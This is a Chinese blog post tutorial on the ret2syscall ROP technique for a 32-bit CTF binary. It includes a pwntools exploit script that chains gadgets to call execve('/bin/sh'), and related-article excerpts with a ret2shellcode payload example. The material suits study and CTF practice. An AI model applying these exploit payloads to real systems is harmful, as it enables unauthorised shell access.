基本ROP(三)

最新推荐文章于 2024-10-17 18:27:18 发布
最新推荐文章于 2024-10-17 18:27:18 发布
阅读量1.9k 收藏 4
点赞数 3
CC 4.0 BY-SA版权
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Pwnpanda/article/details/80247391

每日一结【第3天】

由于个人水平有限,所以相当一部分是引用CTF Wiki(再次安利一波)

ret2syscall

原理:
ret2syscall需要我们控制程序执行系统调用,获取shell。

样例:rop

前期基本的操作之前两篇已经讲了,这里就直接上图了
这里写图片描述

这里写图片描述

我们这次把程序扔到IDA里㕛有新的发现了
这里写图片描述
这里写图片描述

此次我们利用程序中的gadgets来获得shell,而对应的shell获取则是利用系统调用。简单地说,只要我们把对应获取shell的系统调用的参数放到对应的寄存器中,那么我们在执行int 0x80就可执行对应的系统调用。这里我们利用如下系统调用来获取shell –> execve(“/bin/sh”,NULL,NULL)
其中,该程序是32位,所以我们需要使得

系统调用号即eax应该为0xb
第一个参数即ebx应该指向/bin/sh的地址,其实执行sh的地址也可以
第二个参数即ecx应该为0
第三个参数edx应该为0

而我们如何控制这些寄存器的值 呢?这里就需要使用gadgets。比如说,现在栈顶是10,那么如果此时执行了pop eax,那么现在eax的值就为10。但是我们并不能期待有一段连续的代码可以同时控制对应的寄存器,所以我们需要一段一段控制,这也是我们在gadgets最后使用ret来再次控制程序执行流程的原因。具体寻找gadgets的方法,我们可以使用ropgadgets这个工具。

现在我们先寻找eax的gadgets
这里写图片描述
然后使用同样的方法获得其他寄存器的gadgets
这里写图片描述
这里我们可以选用0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret 直接控制其他几个寄存器
再来获取一下/bin/sh的地址和int 0x80地址
这里写图片描述

万事俱备,只欠exp
exp:

from pwn import *

r = process('./rop')

pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x80be408
payload = flat(
    ['A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
r.sendline(payload)
r.interactive()

这里写图片描述

basic rop3-rop
taopaode的博客
03-11 410
pwn——basic rop (ret2system): 老规矩,先checksec一下: 开启了NX,堆栈不可执行,这里提一下,复制文件进虚拟机之后最好改一下权限,命令是: chmod 755 name 放入ida中:发现get()函数,可以溢出 这里与上一道题不同的是NX保护,所以我们无法通过在用户态的栈里写入一些类似system()的命令,所以我们要往内核态的栈里面写,但两个栈内存上是独...
基本ROP
m0_49959202的博客
08-14 1045
文章目录基本ROP1.原理1.1 概念原理1.2 分类1.2.1 ret2text1.2.2 ret2shellcode1.2.3 ret2syscall2.例题2.1 ret2text2.1.1 习题信息2.1.2 程序分析2.1.3 漏洞定位2.1.4 漏洞利用2.1.4.1 方法一:gdb手工计算2.1.4.2 方法二:cyclic工具测算2.1.4.3 方法:ida直接查看(不一定正确)2.1.5 exp编写2.2 retshellcode2.2.1 习题信息2.2.2 程序分析2.2.3 漏洞定
基础ROP
2302_79813730的博客
01-23 1093
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是。
使用ROP攻击技术
热门推荐
海枫的专栏
09-28 3万+
随着64系统广泛应用,原来通过栈控制函数参数的方法已不再适用了,攻击提出ROP攻击,又展开了一场新的较量。
CTF笔记:ROP技术
PwnGuo的博客
05-19 790
Security Fest CTF 2016-tvstation 程序执行情况 运行程序发现菜单只有3个选项,但实际在IDA分析可见有选项4. 并且选项4中debug()函数输出system在内存中地址 查看返回值debug_func()函数,明显存在溢出点。 .text节(Section)属于第一个LOAD段(Segment),这个段的文件长度和内存长度是一样的,也就是说所有的代码都是原样映射到内存中,代码之间的相对偏移是不会改变的。由于前面的...
基本ROP技巧总结
极目楚天舒的博客
05-06 5856
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
ROP基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 3345
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
ROP和Ret2libc漏洞
qq_67812668的博客
08-12 1137
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
linux内核rop姿势详解,[原创]rop链攻击原理与思路(x86/x64)
weixin_36025176的博客
05-02 1357
rop链的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
《一步一步学ROP之Android ARM 32位篇》 源码修改版之增加gadgets
06-08
蒸米的代码基础上,加了sqlite3代码便于方便查找gadgets。。。。。。。。。。。。。。。。。。。。。。。。。。。。
ROP技术初识
VI___
07-05 805
1、ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 待续.. 参考: https://www.anquanke.com/post/id/85619 https://bbs.pediy.com/thread-221041.htm https://bbs.pediy.com/thread-123602.htm ...
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7778
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
pwn学习资料整理——ROP技术
recover517的博客
08-30 5684
1. 在32位程序中,参数是以什么形式进行传递的? 2. 在64位程序中,参数是以什么形式进行传递的? 3. 什么是return address? 4. 怎么利用控制栈空间来达到执行程序命令? 5. 32位中构造ROP 6. 64位中构造ROP
Rop开发手册(3):最简单的服务开放平台框架
stamen的程序员之路
08-10 274
:D [quote]Rop项目文档前后写了一个多月,在写的过程中发现很多功能不完善的,又回过头了改项目,此种反复多次,现在Rop开源项目的文档已经差不多了,将陆续在iteye此发出,希望对大家有帮助。在Rop项目的开发过程中得到了众多iteye网友的有力帮助,收到了很多很好的整改的意见,在此对他们的奉献和帮助表示诚挚的感谢,这些网友包括但不限于: [url=http://melin.iteye...
漏洞分析技术实践_ROP技术
kitsch0x97的博客
10-17 1227
栈上保持多个栈帧实体,每个栈帧对应于一个函数执行的环境,这个执行环境主要用于存储函数参数、函数的局部变量、函数执行结束后的返回地址、临时变量和寄存器等。
利用 ROP 技术绕过 DEP 保护的一次简单尝试
CuiXY's Blog
09-23 2046
\x 01 前言 DEP是数据执行保护的英文缩写,全称为Data Execution Prevention。数据执行保护(DEP) 是一套软硬件技术,能够在内存上执行额外检查以帮助防止在系统上运行恶意代码,在 Microsoft Windows XP ServicePack 2及以上版本的Windows中,由硬件和软件一起强制实施DEP(这个技术还是比较老的了)。自从这个技术出现以来也出现...
软件安全实验——lab7(缓冲区溢出3:返回导向编程技术ROP
Onlyone_1314的博客
08-05 2976
目录标题1、举例详细解释什么是Return-orientd Programming ROP?(至少两个例子:x86 和arm)(1)ROP在X86指令集上的实例(2)ROP在ARM上的可行性2、举例描述一个远程缓冲区溢出,思考和本地溢出的区别,攻击难点在哪里?3、描述arm和x64下的缓冲区溢出,比较和x86的差异。 1、举例详细解释什么是Return-orientd Programming ROP?(至少两个例子:x86 和arm) ROP(Return-oriented programming),即“返
pwntools基本指令使用
最新发布
06-10
<think>我们被要求使用中文回答,并且根据提供的引用内容来回答用户关于pwntools库的基本指令和用法的问题。用户的问题:我想了解pwntools库的基本指令和用法根据引用[1][2][3][4],我们可以总结pwntools的一些基本功能和用法。引用[1]提到:pwntools是一整套pwn工具集,包括方便的IO交互函数,ROP、格式化字符串等利用的自动化工具,shellcode生成器等。引用[2]提到:Pwntools拥有本地执行、远程连接读写、shellcode生成、ROP链构建、ELF文件解析、符号泄露等众多强大的功能。引用[3]给出了一些基本的使用方法:引入库、设置上下文、IO交互、payload构造、信息泄露、shellcode生成等。引用[4]展示了一个ret2shellcode的利用脚本,其中包含context设置、连接本地程序、生成shellcode、构造payload等。因此,我们可以按照以下结构组织回答:1.引入pwntools库2.设置上下文(context)3.建立连接(本地或远程)4.进程交互(发送数据、接收数据等)5.常用工具(shellcode生成,ROP,ELF解析等)注意:用户的问题是基本指令和用法,所以我们重点介绍基本操作,并给出一个简单示例。同时,我们还需要根据系统级指令要求:-行内数学表达式用$...$(但本问题可能不涉及数学表达式)-独立公式用$$...$$(同样,本问题可能不涉及)-LaTeX语法正确(这里主要是代码块)-使用中文-生成相关问题-引用的段落末尾添加引用标识由于用户的问题是基于提供的引用,我们将引用信息融入回答中,并在适当位置添加引用标识。回答结构:一、pwntools简介二、基本用法1.引入库2.设置上下文3.建立连接4.发送和接收数据5.其他常用功能(如生成shellcode、ROP等)、示例代码(一个简单的本地利用)四、相关问题注意:我们给出的示例代码将基于引用[4]中的ret2shellcode示例,但会简化以突出基本指令。</think> ### pwntools库的基本指令与使用方法 #### 一、基础环境设置 1. **引入库与上下文配置** ```python from pwn import * # 核心库导入 context(os=&#39;linux&#39;, arch=&#39;amd64&#39;, log_level=&#39;debug&#39;) # 设置OS、架构和日志级别[^4] ``` - `os`: 目标系统(通常为`linux`) - `arch`: CPU架构(`amd64`/`i386`) - `log_level`: 调试日志等级(`debug`显示完整IO过程) #### 二、进程交互操作 2. **连接控制** ```python io = process(&#39;./binary&#39;) # 本地程序连接[^4] io = remote(&#39;127.0.0.1&#39;, 4444) # 远程连接(IP+端口)[^2] ``` 3. **数据读写** ```python io.send(b&#39;data&#39;) # 发送原始字节 io.sendline(b&#39;data&#39;) # 发送数据+换行符 print(io.recv(1024)) # 接收1024字节 io.interactive() # 进入交互式shell[^4] ``` #### 、核心功能模块 4. **ELF解析** ```python elf = ELF(&#39;./binary&#39;) print(hex(elf.symbols[&#39;main&#39;])) # 获取函数地址 print(hex(elf.got[&#39;puts&#39;])) # 获取GOT表地址 ``` 5. **Shellcode生成** ```python shellcode = asm(shellcraft.sh()) # 生成/bin/sh的shellcode[^4] ``` 6. **ROP链构建** ```python rop = ROP(elf) rop.call(&#39;puts&#39;, [elf.got[&#39;puts&#39;]]) rop.call(&#39;main&#39;) print(rop.chain()) # 生成ROP链 ``` #### 四、内存操作工具 7. **封包函数** ```python p32(0x804a080) # 将地址转为小端序4字节(32位) p64(0x804a080) # 小端序8字节(64位) ``` 8. **格式化字符串利用** ```python fmt = FmtStr(offset=6) fmt.write(0x0804c044, 0xdeadbeef) # 向指定地址写入数据 ``` #### 五、基础利用示例(本地ret2shellcode) ```python context(os=&#39;linux&#39;, arch=&#39;i386&#39;, log_level=&#39;debug&#39;) io = process(&#39;./vuln&#39;) buf_addr = 0x0804a080 # 可执行内存地址 shellcode = asm(shellcraft.sh()) payload = shellcode.ljust(112, b&#39;A&#39;) + p32(buf_addr) io.sendline(payload) io.interactive() # 获取shell[^4] ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值